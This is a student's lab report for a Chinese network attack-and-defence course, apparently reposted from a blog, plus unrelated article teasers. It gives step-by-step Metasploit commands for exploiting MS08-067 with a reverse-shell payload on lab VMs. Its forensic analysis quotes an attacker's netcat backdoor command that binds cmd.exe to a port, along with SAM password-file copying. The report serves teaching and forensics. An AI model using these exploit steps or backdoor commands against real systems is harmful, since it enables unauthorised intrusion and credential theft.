# 20241902 2024-2025-2 《网络攻防实践》第六周作业

news/2025/3/20 17:07:40/文章来源:https://www.cnblogs.com/loveshan/p/18783459

1.实验内容

通过本周的学习和实践,学习使用metasploitable对windows进行远程的渗透测试实验;学习利用wireshark进行日志文件的分析和攻击取证,解读攻击者所利用的攻击、攻击者的具体操作以及如何对攻击行为进行防范;实践同一内网中对利用metasploitable对其他windows系统进行渗透攻击。

2.实验过程

实验1 实践Metasploitable windows attacker

在kali中输入命令msfconsole,启动metasploitable:

输入命令search ms08_067,查看使用漏洞所对应的模块编号:

输入命令info 0,查看靶机使用的范围,发现目标靶机Win2k在适用范围内:

输入命令use 0,使用该漏洞模块,再使用命令show payloads查看可用载荷:

输入命令set payload generic/shell_reverse_tcp,选择攻击载荷反向tcp连接,并show options查看配置参数:


输入命令set RHOST 192.168.200.125,指定靶机ip,并再次查看配置参数,可见配置成功:


输入命令exploit,成功获取靶机权限:

实验2 取证分析实践

(1)攻击者使用了什么破解工具进行攻击?

在kali中使用wireshark打开log文件,并使用ip.addr ==172.16.1.106 and http进行筛选:

快速浏览数据包记录,在117和146包发现入侵痕迹:




分别跟踪其TCP数据流可见,在117内有%C0%AF字符,百度可知此为Unicode漏洞攻击;在146内可见有SQL注入语句和ADM!ROX!YOUR!WORLD,百度知此为msadcs.dll中的RDS漏洞。

(2)攻击者如何使用这个破解工具进入并控制了系统

快速浏览各TCP流,可见有多条shell语句:



通过诸多shell语句,攻击者尝试对靶机进行文件传输、口令猜解、提权、上传后门等操作。继续分析,发现攻击者成功与靶机建立FTP连接,并上传后门程序nc.exe

利用后门程序执行命令c nc -l -p 6969 -e cmd1.exe,攻击者成功渗透目标获得连接权限:

(3)攻击者获得系统访问权限后做了什么

通过跟踪TCP流,发现攻击者存在目录嗅探、查询管理组、试图添加管理员权限、猜解密码、删除文件、清除入侵痕迹等操作:






攻击者还通过执行rdisk尝试获得SAM口令文件的拷贝,将SAM文件保存为c:\har.txt文件。

(4)我们如何防止这样的攻击

可以通过及时修补漏洞(Unicode、RDS),安装服务器防火墙(安全狗),利用安全工具扫描盘符清除木马后门,定期更换管理员密码,制定更为完善的防火墙规则等操作防范这样的攻击。

(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

攻击者发现了此目标位蜜罐,因为在TCP流中发现了如下信息:

实验3 团队对抗实践:windows系统远程渗透攻击和分析

配置靶机和攻击机网络环境,靶机ip为192.168.1.107,攻击机ip为192.168.1.104,并检测连通性:

与实验一操作相同,将target的ip更改为192.168.1.107,执行exploit进行攻击:

成功获得系统权限,在靶机c:\下新建文件夹bighackersqy,并新建txt文档,内容为hello,ek!,登录靶机发现上述文件夹和文件。

攻击时在攻击机kali开启wireshark监听,通过tcp流分析攻击行为,可见攻击行为均被捕获:

3.学习中遇到的问题及解决

  • 问题1:不能正确的分析日志文件
  • 问题1解决方案:阅览多个相关网页,学习如何从日志文件中分析敌手的攻击行为
  • 问题2:实验3中攻击机无法ping通靶机
  • 问题2解决方案:靶机网络适配器改为桥接模式,并修改Internet协议(TCP/IP)属性为自动获取ip地址

4.学习感悟、思考等

通过本次实践,学习了如何使用metasploitable对其他主机利用已知漏洞进行渗透攻击。此外还学习了怎样使用wireshark分析攻击日志文件,以获取攻击者所利用的工具、漏洞和所实施的攻击行为等信息,以为增强系统的防护提供依据。

参考资料

  • Wireshark之流量包分析+日志分析 (护网:蓝队)web安全 取证 分析黑客攻击流程(上篇)
  • wirehark数据分析与取证logs.pcapng

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/902083.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

gitlab+jenkins+harbor+k8s安装操作流程之rancher

关闭防火墙 systemctl stop firewalld yum安装依赖 yum install -y yum-utils device-mapper-persistent-data lvm2 下载docker-ce.repo源 wget https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo -O /etc/yum.repos.d/docker-ce.repo 安装docker yum install…

win11优化pyenv-venv虚拟环境切换

问题 使用 pyenv-venv activate env_name 命令激活虚拟环境后无法使用tab自动完善命令无法上下键切换历史命令脚本 #!/usr/bin/bashvenvs="/d/JavaProgramFiles/pyenv-win/pyenv-win-venv/envs" # #!/bin/bashactivate () {# 设置 PATHORIGIN_PATH="${ORIGIN_P…

安装Harbor

环境:OS:Centos 7说明:需要docker和 docker compose[root@node1 data]# docker version Client: Docker Engine - CommunityVersion: 26.1.4API version: 1.45Go version: go1.21.11Git commit: 5650f9bBuilt: Wed Jun 5 11:32:04…

Linux学习路线

Linux 学习路线Linux 学习路线 by 程序员鱼皮💂 + 💻 = 👴🏽 建议先观看视频入门:https://www.bilibili.com/video/BV1ev411G7VE/ 为什么学 Linux? 相比于 Windows,Linux 免费、开源、安全、灵活、稳定、便于开发,所以更受企业青睐,甚至 90% 以上 的企业应用都是用…

【无问AI网络安全大模型】协助渗透测试挖掘sql注入

在日常工作中发现了一个登录框,话不多说,搞搞看看存不存在SQL注入。输入用户名密码开始抓包,可以看出用户名密码都进行了加密这个时候输入单引号,发现页面报错。 输入双引号,页面恢复正常这个时候,可以判断这个系统存在注入的可能非常大, 手工使用了报错注入、盲注都不行…

20242934 2024-2025-2 《网络攻防实践》第四周作业

1.实践内容 在网络攻防实验环境中完成TCP/IP协议栈重点协议的攻击实验,包括ARP缓存欺骗攻击、ICMP重定向攻击、SYN Flood攻击、TCP RST攻击、TCP会话劫持攻击。 ARP缓存欺骗攻击:通过伪造ARP消息,欺骗目标设备将攻击者的MAC地址与合法IP地址关联,从而截获或篡改网络数据,造…

ConcurrentHashMap和锁

为什么HashMap数组的长度是2的指数次幂? 因为HashMap的底层是数组+链表+红黑树,在插入元素时,需要通过索引获得插入元素的位置,计算索引的方法是使用哈希函数,将元素的哈希值与数组长度取模,当数组长度是2的指数次幂时,取模操作相当于对元素的哈希值进行二进制位与运算(…

麒麟系统V10系统安全加固

一、安装clamav杀毒软件 1.在clamav官网下载:https://www.clamav.net/downloads 也可以在github上下载早一点的版本:https://github.com/Cisco-Talos/clamav/releases 我这里安装clamav-1.1.2rpm -ivh clamav-1.1.2.linux.x86_64.rpm2.下载病毒库: https://database.clamav.…

孤独摇滚 K-ON wallpapers

双厨狂喜 孤独摇滚K-ON

医疗器械行业IPD流程设计:6个关键问题与解决方案

在当今竞争激烈的医疗器械行业,产品的创新与快速上市能力是企业生存和发展的关键。IPD(集成产品开发)流程作为一种先进的产品开发管理模式,正逐渐成为医疗器械企业提升竞争力的重要手段。然而,在实际应用中,许多企业在 IPD 流程设计方面面临着诸多挑战。本文将深入探讨医…

KUKA库卡KR360_R2830机械臂维修减速机卡住了

库卡机器人维修减速机卡死,作为一种常见的机械故障,其成因往往复杂多样,通常可以归结为长时间的高强度工作、外部异物的侵入、安装过程中的疏忽以及润滑系统的失效等多种因素。以下是对这一故障常见原因的详尽阐述,以及一些实用的维修建议:库卡机器人减速机卡死现象的根源…

【原厂】点阵LED数码管驱动/内置显示RAM为8x16位-LED显示驱动芯片VK1640 SOP28

产品品牌:永嘉微电/VINKA 产品型号:VK1640 封装形式:SOP28 概述 VK1640是一种数码管或点阵LED驱动控制专用芯片,内部集成有数据锁存器、LED 驱 动等电路。SEG脚接LED阳极,GRID脚接LED阴极,可支持8SEGx16GRID的点阵LED显示。 适用于小型LED显示屏驱动。采用SOP28的封装形式…